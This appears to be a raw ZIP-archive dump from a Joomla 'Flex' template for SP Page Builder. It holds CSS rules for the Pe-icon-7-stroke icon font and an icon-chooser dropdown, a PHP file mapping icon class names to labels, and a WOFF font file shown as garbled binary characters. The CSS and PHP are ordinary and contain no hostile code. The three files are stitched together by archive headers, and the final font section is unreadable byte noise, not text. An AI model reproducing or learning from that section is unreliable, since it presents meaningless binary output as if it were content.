	content: "\e6a1";
}
.pe-7s-plus:before {
	content: "\e623";
}
.pe-7s-left-arrow:before {
	content: "\e6a2";
}
.pe-7s-play:before {
	content: "\e624";
}
.pe-7s-key:before {
	content: "\e6a3";
}
.pe-7s-plane:before {
	content: "\e625";
}
.pe-7s-joy:before {
	content: "\e6a4";
}
.pe-7s-photo-gallery:before {
	content: "\e626";
}
.pe-7s-pin:before {
	content: "\e69b";
}
.pe-7s-phone:before {
	content: "\e627";
}
.pe-7s-plug:before {
	content: "\e69a";
}
.pe-7s-pen:before {
	content: "\e628";
}
.pe-7s-right-arrow:before {
	content: "\e699";
}
.pe-7s-paper-plane:before {
	content: "\e629";
}
.pe-7s-delete-user:before {
	content: "\e6a7";
}
.pe-7s-paint:before {
	content: "\e62a";
}
.pe-7s-bottom-arrow:before {
	content: "\e6a8";
}
.pe-7s-notebook:before {
	content: "\e62b";
}
.pe-7s-note:before {
	content: "\e62c";
}
.pe-7s-next:before {
	content: "\e62d";
}
.pe-7s-news-paper:before {
	content: "\e62e";
}
.pe-7s-musiclist:before {
	content: "\e62f";
}
.pe-7s-music:before {
	content: "\e630";
}
.pe-7s-mouse:before {
	content: "\e631";
}
.pe-7s-more:before {
	content: "\e632";
}
.pe-7s-moon:before {
	content: "\e633";
}
.pe-7s-monitor:before {
	content: "\e634";
}
.pe-7s-micro:before {
	content: "\e635";
}
.pe-7s-menu:before {
	content: "\e636";
}
.pe-7s-map:before {
	content: "\e637";
}
.pe-7s-map-marker:before {
	content: "\e638";
}
.pe-7s-mail:before {
	content: "\e639";
}
.pe-7s-mail-open:before {
	content: "\e63a";
}
.pe-7s-mail-open-file:before {
	content: "\e63b";
}
.pe-7s-magnet:before {
	content: "\e63c";
}
.pe-7s-loop:before {
	content: "\e63d";
}
.pe-7s-look:before {
	content: "\e63e";
}
.pe-7s-lock:before {
	content: "\e63f";
}
.pe-7s-lintern:before {
	content: "\e640";
}
.pe-7s-link:before {
	content: "\e641";
}
.pe-7s-like:before {
	content: "\e642";
}
.pe-7s-light:before {
	content: "\e643";
}
.pe-7s-less:before {
	content: "\e644";
}
.pe-7s-keypad:before {
	content: "\e645";
}
.pe-7s-junk:before {
	content: "\e646";
}
.pe-7s-info:before {
	content: "\e647";
}
.pe-7s-home:before {
	content: "\e648";
}
.pe-7s-help2:before {
	content: "\e649";
}
.pe-7s-help1:before {
	content: "\e64a";
}
.pe-7s-graph3:before {
	content: "\e64b";
}
.pe-7s-graph2:before {
	content: "\e64c";
}
.pe-7s-graph1:before {
	content: "\e64d";
}
.pe-7s-graph:before {
	content: "\e64e";
}
.pe-7s-global:before {
	content: "\e64f";
}
.pe-7s-gleam:before {
	content: "\e650";
}
.pe-7s-glasses:before {
	content: "\e651";
}
.pe-7s-gift:before {
	content: "\e652";
}
.pe-7s-folder:before {
	content: "\e653";
}
.pe-7s-flag:before {
	content: "\e654";
}
.pe-7s-filter:before {
	content: "\e655";
}
.pe-7s-file:before {
	content: "\e656";
}
.pe-7s-expand1:before {
	content: "\e657";
}
.pe-7s-exapnd2:before {
	content: "\e658";
}
.pe-7s-edit:before {
	content: "\e659";
}
.pe-7s-drop:before {
	content: "\e65a";
}
.pe-7s-drawer:before {
	content: "\e65b";
}
.pe-7s-download:before {
	content: "\e65c";
}
.pe-7s-display2:before {
	content: "\e65d";
}
.pe-7s-display1:before {
	content: "\e65e";
}
.pe-7s-diskette:before {
	content: "\e65f";
}
.pe-7s-date:before {
	content: "\e660";
}
.pe-7s-cup:before {
	content: "\e661";
}
.pe-7s-culture:before {
	content: "\e662";
}
.pe-7s-crop:before {
	content: "\e663";
}
.pe-7s-credit:before {
	content: "\e664";
}
.pe-7s-copy-file:before {
	content: "\e665";
}
.pe-7s-config:before {
	content: "\e666";
}
.pe-7s-compass:before {
	content: "\e667";
}
.pe-7s-comment:before {
	content: "\e668";
}
.pe-7s-coffee:before {
	content: "\e669";
}
.pe-7s-cloud:before {
	content: "\e66a";
}
.pe-7s-clock:before {
	content: "\e66b";
}
.pe-7s-check:before {
	content: "\e66c";
}
.pe-7s-chat:before {
	content: "\e66d";
}
.pe-7s-cart:before {
	content: "\e66e";
}
.pe-7s-camera:before {
	content: "\e66f";
}
.pe-7s-call:before {
	content: "\e670";
}
.pe-7s-calculator:before {
	content: "\e671";
}
.pe-7s-browser:before {
	content: "\e672";
}
.pe-7s-box2:before {
	content: "\e673";
}
.pe-7s-box1:before {
	content: "\e674";
}
.pe-7s-bookmarks:before {
	content: "\e675";
}
.pe-7s-bicycle:before {
	content: "\e676";
}
.pe-7s-bell:before {
	content: "\e677";
}
.pe-7s-battery:before {
	content: "\e678";
}
.pe-7s-ball:before {
	content: "\e679";
}
.pe-7s-back:before {
	content: "\e67a";
}
.pe-7s-attention:before {
	content: "\e67b";
}
.pe-7s-anchor:before {
	content: "\e67c";
}
.pe-7s-albums:before {
	content: "\e67d";
}
.pe-7s-alarm:before {
	content: "\e67e";
}
.pe-7s-airplay:before {
	content: "\e67f";
}


/* HELPER CLASS 
 * -------------------------- */


/* makes the font 33% larger relative to the icon container */
.pe-lg {
  font-size: 1.3333333333333333em;
  line-height: 0.75em;
  vertical-align: -15%;
}
.pe-2x {
  font-size: 2em;
}
.pe-3x {
  font-size: 3em;
}
.pe-4x {
  font-size: 4em;
}
.pe-5x {
  font-size: 5em;
}
.pe-fw {
  width: 1.2857142857142858em;
  text-align: center;
}
.pe-ul {
  padding-left: 0;
  margin-left: 2.142857142857143em;
  list-style-type: none;
}
.pe-ul > li {
  position: relative;
}
.pe-li {
  position: absolute;
  left: -2.142857142857143em;
  width: 2.142857142857143em;
  top: 0.14285714285714285em;
  text-align: center;
}
.pe-li.pe-lg {
  left: -1.8571428571428572em;
}
.pe-border {
  padding: .2em .25em .15em;
  border: solid 0.08em #eeeeee;
  border-radius: .1em;
}
.pull-right {
  float: right;
}
.pull-left {
  float: left;
}
.pe.pull-left {
  margin-right: .3em;
}
.pe.pull-right {
  margin-left: .3em;
}
.pe-spin {
  -webkit-animation: spin 2s infinite linear;
  -moz-animation: spin 2s infinite linear;
  -o-animation: spin 2s infinite linear;
  animation: spin 2s infinite linear;
}
@-moz-keyframes spin {
  0% {
    -moz-transform: rotate(0deg);
  }
  100% {
    -moz-transform: rotate(359deg);
  }
}
@-webkit-keyframes spin {
  0% {
    -webkit-transform: rotate(0deg);
  }
  100% {
    -webkit-transform: rotate(359deg);
  }
}
@-o-keyframes spin {
  0% {
    -o-transform: rotate(0deg);
  }
  100% {
    -o-transform: rotate(359deg);
  }
}
@-ms-keyframes spin {
  0% {
    -ms-transform: rotate(0deg);
  }
  100% {
    -ms-transform: rotate(359deg);
  }
}
@keyframes spin {
  0% {
    transform: rotate(0deg);
  }
  100% {
    transform: rotate(359deg);
  }
}
.pe-rotate-90 {
  filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=1);
  -webkit-transform: rotate(90deg);
  -moz-transform: rotate(90deg);
  -ms-transform: rotate(90deg);
  -o-transform: rotate(90deg);
  transform: rotate(90deg);
}
.pe-rotate-180 {
  filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=2);
  -webkit-transform: rotate(180deg);
  -moz-transform: rotate(180deg);
  -ms-transform: rotate(180deg);
  -o-transform: rotate(180deg);
  transform: rotate(180deg);
}
.pe-rotate-270 {
  filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=3);
  -webkit-transform: rotate(270deg);
  -moz-transform: rotate(270deg);
  -ms-transform: rotate(270deg);
  -o-transform: rotate(270deg);
  transform: rotate(270deg);
}
.pe-flip-horizontal {
  filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1);
  -webkit-transform: scale(-1, 1);
  -moz-transform: scale(-1, 1);
  -ms-transform: scale(-1, 1);
  -o-transform: scale(-1, 1);
  transform: scale(-1, 1);
}
.pe-flip-vertical {
  filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1);
  -webkit-transform: scale(1, -1);
  -moz-transform: scale(1, -1);
  -ms-transform: scale(1, -1);
  -o-transform: scale(1, -1);
  transform: scale(1, -1);
}
.pe-stack {
  position: relative;
  display: inline-block;
  width: 2em;
  height: 2em;
  line-height: 2em;
  vertical-align: middle;
}
.pe-stack-1x,
.pe-stack-2x {
  position: absolute;
  left: 0;
  width: 100%;
  text-align: center;
}
.pe-stack-1x {
  line-height: inherit;
}
.pe-stack-2x {
  font-size: 2em;
}
.pe-inverse {
  color: #ffffff;
}

/* Custom classes / mods - PIXEDEN */
.pe-va {
  vertical-align: middle;
}

.pe-border {
  border: solid 0.08em #eaeaea;
}

[class^="pe-7s-"], [class*=" pe-7s-"] {
  display: inline-block;
}

/*Pixeden (Pe) Icons*/
.pixeden-form-group {
  margin-bottom: 30px;
}
.pixeden-form-group label {
  margin: 0;
  padding: 0;
  display: block;
  font-size: 14px;
  line-height: 1;
  margin-bottom: 10px;
  font-weight: 600;
  color: #000;
}

.pixeden-icon-chooser {
  background-color: #fff;
  border: 1px solid #ccc;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
  height: 46px;
  line-height: 46px;
  border-radius: 3px;
  position: relative;
  z-index: 1000;
}

.pixeden-icon-chooser.open {
  border-radius: 3px 3px 0 0;
  border-bottom-color: transparent;
  box-shadow: 0 3px 5px rgba(0, 0, 0, 0.5);
  -webkit-box-shadow: 0 3px 5px rgba(0, 0, 0, 0.5);
}

.pixeden-icon-chooser .pixeden-icon-input {
  display: block;
  height: 30px;
  line-height: 30px;
  cursor: pointer;
}

.pixeden-icon-chooser > .pixeden-icon-input span { 
  display: block;
  line-height: 46px;
  padding: 0 10px;
}
.pixeden-icon-chooser > .pixeden-icon-input span i {
  margin-right:4px;
}
.pixeden-icon-chooser > .pixeden-icon-input span i { 
  margin-right:4px;
  font-size:125%;
  font-weight:500;
  line-height:1.2;
  vertical-align:middle;
  color: #89B01E;
}

.pixeden-icon-chooser > .pixeden-icon-input .fa-chevron-up,
.pixeden-icon-chooser > .pixeden-icon-input .fa-chevron-down {
  position: absolute;
  top: 16px;
  right: 10px;
}

.pixeden-icon-chooser > .pixeden-icon-input .fa-times {
  position: absolute;
  top: 16px;
  right: 30px;
  color: #e61010;
  display: none;
  z-index: 10001;
}

.pixeden-icon-chooser.has-pe-icon > .pixeden-icon-input .fa-times {
  display: inline;
}

.pixeden-icon-chooser > .pixeden-icon-input .fa-chevron-up {
  display: none;
}

.pixeden-icon-chooser.open > .pixeden-icon-input .fa-chevron-up {
  display: inline;
}

.pixeden-icon-chooser.open > .pixeden-icon-input .fa-chevron-down {
  display: none;
}

.pixeden-icon-chooser.open > .pixeden-dropdown {
  display: block;
}

.pixeden-dropdown {
 display: none;
  position: absolute;
  top: 46px;
  left: 0px;
  right: 0px;
  padding: 10px;
  background: #fff;
  border: 1px solid #ccc;
  border-top: 0;
  box-shadow: 0 3px 5px rgba(0,0,0,.5);
  -webkit-box-shadow: 0 3px 5px rgba(0,0,0,.5);
  border-radius: 0 0 3px 3px;
}

.pixeden-dropdown input[type="text"] {
  margin-bottom: 10px;
}

ul.pixeden-icons {
	list-style: none;
	padding: 0;
	margin: 0;
	max-height: 328px;
	overflow-y: auto;
}

ul.pixeden-icons > li {
  float: left;
  display: block;
  width: 12.5%;
  text-align: center;
}

ul.pixeden-icons > li > div {
  display: block;
  margin: 1px;
  padding: 5px;
  height: 80px;
  border-radius: 3px;
  background: #f3f3f3;
  cursor: pointer;
  -webkit-transition: all 100ms;
  transition: all 100ms;
}

ul.pixeden-icons > li > div > div {
  display: table;
  width: 100%;
  height: 100%;
}

ul.pixeden-icons > li > div > div > div {
  display: table-cell;
  vertical-align: middle;
}

ul.pixeden-icons > li > div .pe {
  display: block;
  font-size: 24px;
  line-height: 24px;
  margin-bottom: 5px;
}

ul.pixeden-icons > li > div span {
  font-size: 12px;
  line-height: 1.2;
  display: block;
}

ul.pixeden-icons > li:hover > div,
ul.pixeden-icons > li.active > div {
	background-color: #89B01E;
	color: #fff;
}
.sp-pagebuilder-pixeden-icon-chooser {
  height: 46px;
  line-height: 46px;
  background-color: #edf1f5;
  border-radius: 3px;
  position: relative;
  z-index: 9999;
}
.sp-pagebuilder-pixeden-icon-chooser.open {
  border-radius: 3px 3px 0 0;
  border-bottom-color: transparent;
  box-shadow: 0 3px 5px rgba(0, 0, 0, 0.5);
  -webkit-box-shadow: 0 3px 5px rgba(0, 0, 0, 0.5);
}
.sp-pagebuilder-pixeden-icon-chooser .sp-pagebuilder-pixeden-icon-input {
  display: block;
  height: 30px;
  line-height: 30px;
  cursor: pointer;
}
.sp-pagebuilder-pixeden-icon-chooser > .sp-pagebuilder-pixeden-icon-input span {
  display: block;
  line-height: 46px;
  padding: 0 10px;
}
.sp-pagebuilder-pixeden-icon-chooser > .sp-pagebuilder-pixeden-icon-input .fa-chevron-up,
.sp-pagebuilder-pixeden-icon-chooser > .sp-pagebuilder-pixeden-icon-input .fa-chevron-down {
  position: absolute;
  top: 16px;
  right: 10px;
}
.sp-pagebuilder-pixeden-icon-chooser > .sp-pagebuilder-pixeden-icon-input .fa-times {
  position: absolute;
  top: 16px;
  right: 30px;
  color: #e61010;
  display: none;
  z-index: 10001;
}
.sp-pagebuilder-pixeden-icon-chooser > .sp-pagebuilder-pixeden-icon-input .fa-chevron-up {
  display: none;
}
.sp-pagebuilder-pixeden-icon-chooser.sp-pagebuilder-has-pe-icon > .sp-pagebuilder-pixeden-icon-input .fa-times {
  display: inline;
}
.sp-pagebuilder-pixeden-icon-chooser .sp-pagebuilder-pixeden-dropdown {
  display: none;
  position: absolute;
  top: 46px;
  left: 0px;
  right: 0px;
  padding: 10px;
  background: #fff;
  border-top: 0;
  box-shadow: 0 3px 5px rgba(0, 0, 0, 0.5);
  -webkit-box-shadow: 0 3px 5px rgba(0, 0, 0, 0.5);
  border-radius: 0 0 3px 3px;
}
.sp-pagebuilder-pixeden-icon-chooser .sp-pagebuilder-pixeden-dropdown input[type="text"] {
  margin-bottom: 10px;
}
.sp-pagebuilder-pixeden-icon-chooser .sp-pagebuilder-pixeden-dropdown ul.sp-pagebuilder-pixeden-icons {
  list-style: none;
  padding: 0;
  margin: 0;
  max-height: 328px;
  overflow-y: auto;
}
.sp-pagebuilder-pixeden-icon-chooser .sp-pagebuilder-pixeden-dropdown ul.sp-pagebuilder-pixeden-icons > li {
  float: left;
  display: block;
  width: 12.5%;
  text-align: center;
}
.sp-pagebuilder-pixeden-icon-chooser .sp-pagebuilder-pixeden-dropdown ul.sp-pagebuilder-pixeden-icons > li > div {
  display: block;
  margin: 1px;
  padding: 5px;
  height: 80px;
  border-radius: 3px;
  background: #eee;
  cursor: pointer;
  -webkit-transition: all 100ms;
  transition: all 100ms;
}
.sp-pagebuilder-pixeden-icon-chooser .sp-pagebuilder-pixeden-dropdown ul.sp-pagebuilder-pixeden-icons > li > div .pe {
  display: block;
  font-size: 24px;
  line-height: 24px;
  margin-bottom: 5px;
}
.sp-pagebuilder-pixeden-icon-chooser .sp-pagebuilder-pixeden-dropdown ul.sp-pagebuilder-pixeden-icons > li > div span {
  font-size: 12px;
  line-height: 1.2;
  display: block;
}
.sp-pagebuilder-pixeden-icon-chooser .sp-pagebuilder-pixeden-dropdown ul.sp-pagebuilder-pixeden-icons > li > div > div {
  display: table;
  width: 100%;
  height: 100%;
}
.sp-pagebuilder-pixeden-icon-chooser .sp-pagebuilder-pixeden-dropdown ul.sp-pagebuilder-pixeden-icons > li > div > div > div {
  display: table-cell;
  vertical-align: middle;
}
.sp-pagebuilder-pixeden-icon-chooser .sp-pagebuilder-pixeden-dropdown ul.sp-pagebuilder-pixeden-icons > li.active > div,
.sp-pagebuilder-pixeden-icon-chooser .sp-pagebuilder-pixeden-dropdown ul.sp-pagebuilder-pixeden-icons > li:hover > div {
  background-color: #1e7ed8;
  color: #fff;
}
.sp-pagebuilder-pixeden-icon-chooser.open > .sp-pagebuilder-pixeden-dropdown {
  display: block;
}
.sp-pagebuilder-pixeden-icon-chooser.open > .sp-pagebuilder-pixeden-icon-input .fa-chevron-up {
  display: inline;
}
.sp-pagebuilder-pixeden-icon-chooser.open > .sp-pagebuilder-pixeden-icon-input .fa-chevron-down {
  display: none;
}PK!���+flex/sppagebuilder/fields/pixeden-icons.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2016 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('restricted access');

	$peicon_list = array(
		'pe-7s-album'=>'album',	
		'pe-7s-arc'=>'arc',
		'pe-7s-back-2'=>'back-2',
		'pe-7s-bandaid'=>'bandaid',
		'pe-7s-car'=>'car',
		'pe-7s-diamond'=>'diamond',
		'pe-7s-door-lock'=>'door-lock',
		'pe-7s-eyedropper'=>'eyedropper',
		'pe-7s-female'=>'female',
		'pe-7s-gym'=>'gym',
		'pe-7s-hammer'=>'hammer',
		'pe-7s-headphones'=>'headphones',
		'pe-7s-helm'=>'helm',
		'pe-7s-hourglass'=>'hourglass',
		'pe-7s-leaf'=>'leaf',
		'pe-7s-magic-wand'=>'magic-wand',
		'pe-7s-male'=>'male',
		'pe-7s-map-2'=>'map-2',
		'pe-7s-next-2'=>'next-2',
		'pe-7s-paint-bucket'=>'paint-bucket',
		'pe-7s-pendrive'=>'pendrive',
		'pe-7s-photo'=>'photo',
		'pe-7s-piggy'=>'piggy',
		'pe-7s-plugin'=>'plugin',
		'pe-7s-refresh-2'=>'refresh-2',
		'pe-7s-rocket'=>'rocket',
		'pe-7s-settings'=>'settings',
		'pe-7s-shield'=>'shield',
		'pe-7s-smile'=>'smile',
		'pe-7s-usb'=>'usb',
		'pe-7s-vector'=>'vector',
		'pe-7s-wine'=>'wine',
		'pe-7s-cloud-upload'=>'cloud-upload',
		'pe-7s-cloud-download'=>'cloud-download',
		'pe-7s-cash'=>'cach',
		'pe-7s-close'=>'close',
		'pe-7s-bluetooth'=>'bluetooth',
		'pe-7s-way'=>'way',
		'pe-7s-close-circle'=>'close-circle',
		'pe-7s-id'=>'id',
		'pe-7s-wristwatch'=>'wristwatch',	
		'pe-7s-world'=>'world',
		'pe-7s-angle-left'=>'angle-left',
		'pe-7s-angle-right'=>'angle-right',
		'pe-7s-angle-left-circle'=>'angle-left-circle',
		'pe-7s-angle-right-circle'=>'angle-right-circle',
		'pe-7s-angle-up'=>'angle-up',
		'pe-7s-angle-down'=>'angle-down',
		'pe-7s-angle-up-circle'=>'angle-up-circle',
		'pe-7s-angle-down-circle'=>'angle-down-circle',
		'pe-7s-left-arrow'=>'left-arrow',
		'pe-7s-right-arrow'=>'right-arrow',
		'pe-7s-up-arrow'=>'up-arrow',
		'pe-7s-user'=>'user',
		'pe-7s-user-female'=>'user-female',
		'pe-7s-users'=>'users',
		'pe-7s-add-user'=>'add-user',
		'pe-7s-delete-user'=>'delete-user',
		'pe-7s-switch'=>'switch',
		'pe-7s-scissors'=>'scissors',
		'pe-7s-wallet'=>'wallet',
		'pe-7s-safe'=>'safe',
		'pe-7s-volume'=>'volume',
		'pe-7s-volume2'=>'volume2',
		'pe-7s-volume1'=>'volume1',
		'pe-7s-voicemail'=>'voicemail',
		'pe-7s-video'=>'video',
		'pe-7s-download'=>'download',
		'pe-7s-upload'=>'upload',
		'pe-7s-unlock'=>'unlock',
		'pe-7s-umbrella'=>'umbrella',
		'pe-7s-trash'=>'trash',
		'pe-7s-tools'=>'tools',
		'pe-7s-timer'=>'timer',
		'pe-7s-ticket'=>'ticket',
		'pe-7s-target'=>'target',
		'pe-7s-sun'=>'sun',
		'pe-7s-study'=>'study',
		'pe-7s-stopwatch'=>'stopwatch',
		'pe-7s-star'=>'star',
		'pe-7s-speaker'=>'speaker',
		'pe-7s-signal'=>'signal',
		'pe-7s-shuffle'=>'shuffle',
		'pe-7s-shopbag'=>'shopbag',
		'pe-7s-share'=>'share',
		'pe-7s-server'=>'server',
		'pe-7s-search'=>'search',
		'pe-7s-film'=>'film',
		'pe-7s-science'=>'science',
		'pe-7s-disk'=>'disk',
		'pe-7s-ribbon'=>'ribbon',
		'pe-7s-repeat'=>'repeat',
		'pe-7s-refresh'=>'refresh',
		'pe-7s-refresh-cloud'=>'refresh-cloud',
		'pe-7s-paperclip'=>'paperclip',
		'pe-7s-radio'=>'radio',
		'pe-7s-note2'=>'note2',
		'pe-7s-print'=>'print',
		'pe-7s-network'=>'network',
		'pe-7s-prev'=>'prev',
		'pe-7s-mute'=>'mute',
		'pe-7s-power'=>'power',
		'pe-7s-medal'=>'medal',
		'pe-7s-portfolio'=>'portfolio',
		'pe-7s-like2'=>'like2',
		'pe-7s-plus'=>'plus',
		'pe-7s-play'=>'play',
		'pe-7s-key'=>'key',
		'pe-7s-plane'=>'plane',
		'pe-7s-joy'=>'joy',
		'pe-7s-photo-gallery'=>'photo-gallery',
		'pe-7s-pin'=>'pin',
		'pe-7s-phone'=>'phone',
		'pe-7s-plug'=>'plug',
		'pe-7s-pen'=>'pen',
		'pe-7s-paper-plane'=>'paper-plane',		
		'pe-7s-paint'=>'paint',
		'pe-7s-bottom-arrow'=>'bottom-arrow',
		'pe-7s-notebook'=>'notebook',
		'pe-7s-note'=>'note',
		'pe-7s-next'=>'next',
		'pe-7s-news-paper'=>'news-paper',
		'pe-7s-musiclist'=>'musiclist',
		'pe-7s-music'=>'music',
		'pe-7s-mouse'=>'mouse',
		'pe-7s-more'=>'more',
		'pe-7s-moon'=>'moon',
		'pe-7s-monitor'=>'monitor',
		'pe-7s-micro'=>'micro',
		'pe-7s-menu'=>'menu',
		'pe-7s-map'=>'map',
		'pe-7s-map-marker'=>'map-marker',
		'pe-7s-mail'=>'mail',
		'pe-7s-mail-open'=>'mail-open',
		'pe-7s-mail-open-file'=>'mail-open-file',
		'pe-7s-magnet'=>'magnet',
		'pe-7s-loop'=>'loop',
		'pe-7s-look'=>'look',
		'pe-7s-lock'=>'lock',
		'pe-7s-lintern'=>'lintern',
		'pe-7s-link'=>'link',
		'pe-7s-like'=>'like',
		'pe-7s-light'=>'light',
		'pe-7s-less'=>'less',
		'pe-7s-keypad'=>'keypad',
		'pe-7s-junk'=>'junk',
		'pe-7s-info'=>'info',
		'pe-7s-home'=>'home',
		'pe-7s-help2'=>'help2',
		'pe-7s-help1'=>'help1',
		'pe-7s-graph3'=>'graph3',
		'pe-7s-graph2'=>'graph2',
		'pe-7s-graph1'=>'graph1',
		'pe-7s-graph'=>'graph',
		'pe-7s-global'=>'global',
		'pe-7s-gleam'=>'gleam',
		'pe-7s-glasses'=>'glasses',
		'pe-7s-gift'=>'gift',
		'pe-7s-folder'=>'folder',
		'pe-7s-flag'=>'flag',
		'pe-7s-filter'=>'filter',
		'pe-7s-file'=>'file',
		'pe-7s-expand1'=>'expand1',
		'pe-7s-exapnd2'=>'exapnd2',
		'pe-7s-edit'=>'edit',
		'pe-7s-drop'=>'drop',
		'pe-7s-drawer'=>'drawer',	
		'pe-7s-display2'=>'display2',
		'pe-7s-display1'=>'display1',
		'pe-7s-diskette'=>'diskette',
		'pe-7s-date'=>'date',
		'pe-7s-cup'=>'cup',
		'pe-7s-culture'=>'culture',
		'pe-7s-crop'=>'crop',
		'pe-7s-credit'=>'credit',
		'pe-7s-copy-file'=>'copy-file',
		'pe-7s-config'=>'config',
		'pe-7s-compass'=>'compass',
		'pe-7s-comment'=>'comment',
		'pe-7s-coffee'=>'coffee',
		'pe-7s-cloud'=>'cloud',
		'pe-7s-clock'=>'clock',
		'pe-7s-check'=>'check',
		'pe-7s-chat'=>'chat',
		'pe-7s-cart'=>'cart',
		'pe-7s-camera'=>'camera',
		'pe-7s-call'=>'call',
		'pe-7s-calculator'=>'calculator',
		'pe-7s-browser'=>'browser',
		'pe-7s-box2'=>'box2',
		'pe-7s-box1'=>'box1',
		'pe-7s-bookmarks'=>'bookmarks',
		'pe-7s-bicycle'=>'bicycle',
		'pe-7s-bell'=>'bell',
		'pe-7s-battery'=>'battery',
		'pe-7s-ball'=>'ball',
		'pe-7s-back'=>'back',
		'pe-7s-attention'=>'attention',
		'pe-7s-anchor'=>'anchor',
		'pe-7s-albums'=>'albums',
		'pe-7s-alarm'=>'alarm',
		'pe-7s-airplay'=>'airplay'
	);PK!u�����5flex/sppagebuilder/fields/fonts/Pe-icon-7-stroke.woffnu&1i�wOFF��pOS/2``"�cmaphLLU� gasp�glyf�����Ƴ>�headݰ66E	�hhea��$$��hmtx�88}~loca�D����bmaxp��  ��name���vͫ�post�  �LfGLf��@������  8
 ����� ���������7979793��,1Jc#54&'.#!"3!2654&#%!2!5467>3!!'3267>54&'.#"3#"&'.5467>32�8�������b��xx				D



W/��+E//��"�ޑ						+��'@35#7'#537'"3267>54&'.#"&'.5467>32#�F::FR"<<,N!!N,,N!!N,)GG))GG)V:�:v!4�!N,,N!!N,,N!�gG))GG))G+��)D_�35#7'#5377>7>54&'.'>7>54&'.''>7>54&'.'"&'.5467>327.'.#"3267>7'#�F::FR"<<�		

))Y)GG)&
"*,N!!N,*"
&V:�:v!4`
  

""
�

						



�G))G
!N,,N!
mS2Kd"#>7>54&'.#"3!267>54&'.#467>32#"&'.5"&'.5467>32#�*
�
*****��

$#

#$

|#

#$



$S*



*****s$

$$

$b
$$

$$
O�q"3:54&'.#!"3!267>=35##!"&=463!27#'573�n	��			p*,���usOBJ		�		KC����F1E�3��z�"3267>54&'.#2.'.'.5467>7>76&'0&14676&'.'.'#0#.'.5467>3>7>7>54&'.'4&'.'&476456&'&67>7>73#"&'.'*K  K**K  K*'D






D'�
	


		
%$
� K**K  K**K D'!



	!'D��			

U����%7'735#!#3!KWWB4o4o����WWB���"��E��U��#(%#5467>32354&'.#"#!5#!5!w�
##
((<V4#��4�f"



"""((f��������_�5#7467>323467>323267>5##"&=1467>323467>323>54&'.'".'.#".'.#".'.#">7>32.'.#	3Z"!'	


		
	'!"Z3�

	

	



(  T//T  (�)"#[3�		�
3[#")�
		

		

		
	.Q""Q.	^��$/>CGK#54&'.+"#3;267>535'46;2#51+"&51533#'�UVU
�
�
V
x�
�
�x!��

��

D

��

C��!������������uz��%'7''73267>7>76&/?'.'.#"'7'7.#"733267>7>76&'773267>7>54&'7'#*'?#&47>7>7>327'.7>7>7>32?#"&/#"&/7�[$<H	

''		
IfC$CfH	
('				H=$Z�e++y
	6
�
8	�
	Z$ZDZ$=H



&(


HfC$CfI		


('		
I=$Z	R++��
8		�

6		�eZ$Z	
+��T7013267>54&'0&#'&"7*##35#"&'.5467>7'3267>54&'.#�

hP'DG))G
	!N,,N!!N,�
	Og�	]U F')GG)'"*,N!!N,,N!����
&3#5''73'3267>54&'.#"3#"&54632�q���YH��bPw3



���rY���Od^



3��1Jc��"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32#74&'.#"73267>77'>7>5!467>32#"&'.5	



					

2222++++� K**K 

	#
#
  
#
"	

�wD''DD''D'		
		
		x	

	�2112�,,,,x*K  K*,#,
+		+
,",&EE&'DD'
���16;@EJOTY"3267>54&'.#"&'.5467>32#3#53#5'3#5!3#57'7'7'7'7..//((((�ff�ffGG��GGGG^GG`/../�((((ogg�fff��
GH��GGvHG
��GG��'35!57''7!57���#3"g����Ԁ���-xx����>eg��g���NN�<��(AT77'.'.'5#3267>54&'.'"&'.5467>32#75#35>54&'�*!&CG))G�%AA%%AA%	



T*"" E')GG)%��A%%AA%%A�pp

$$

��
'#7'7#'7/373666��6��6��'nn+c�**�n��f�hh�fltPP�G��O=�
2M3353#53#?'#5377>7>54&'.'>7>54&'.'3�}~�DD�bfgf�		
		
	


		7	wggeDhfUUYQ�SUe&'
 +* 
7



1��1Lg�%"3267>54&'.#"&'.5467>32#5">7>327.'.#5">7>327.'.#">7>327.'.#
		

		


(	
%%
	(#C2/?""?/2B$6'
$12$
'5�	
				
	x
		
�



�,*+
,D

&
#


#
%

*%��%#'#337'#37'737'#}8e�VO�l8MM��OVS
�e8MM8lS�7��8LMDWz7
ML8X3��	0!!!!%3267>=35#3#"&'.=35#33��f���x��((3
##
3��f��wx���));;"

";;��^w��".'.#"3267>73267>54&'.#"'>7>54&'73267>54&'.#2#"&'.5467>3'"&'.5467>32#%"&'.5467>32#�		�
		



	�

					��		



	U

�D�		
T

			]				
		\		T	
		��

D�

<��3Oj�"3267>54&'.#2#"&'.5467>3#"&'.=3267>75#"&'.=3267>75#"&'.=3267>7)GG))GG)(AA((AA(�A((A%77%A((A%77%A((A%77%�
#�#

##
��/D



//V/

/7��!:%'>7>54&'.#"3267>77%467>32#"&'.5�t	;!";;"


t�5445,t


";;"!;	t�5544G��c�����1Jl���%>7>'.'.#".'.#".'.#"3267>73267>73267>76&'.''2.'.'.'.'>7>3.'.'.'.'&454&5465<7>7>7>7>7.'.'>7>7.'.5'.'>77467>77>7>7.'.'<5<5'2.'.'>7>3>7>32.'.'&47"&'.'&67>7#"&'.'>7>7#7#"&'.'>7>7>7>7�			




				

^								

			P

E

W			>		U


�	
	
	(		
|


�	

� 
"
!
 
!
"
 t		�				



	
	BN	
<

�




^	�P




^		^��7!'!3#53#5^����3��"檪����fxx���kkg��D+
��
%!7'7'!5#%!7'!3���H\\Gx��hH\\G��qH\\G�VH\\G�3����)-%#"&'.5467>37'"3267>5#5�D''DD&��*J  K**K �oo�&EE&'DU^]U J+*K  K*@A�>�1m�%4654&'.#".#"3!267>54&'.##!"&'.5467>?>7>327>7>320132#'"&'.5467>37'"3267>5##�0%
			

%="

"��	
		
*

�

@@



�0

	
%
#"

�

			)


<	
	%%



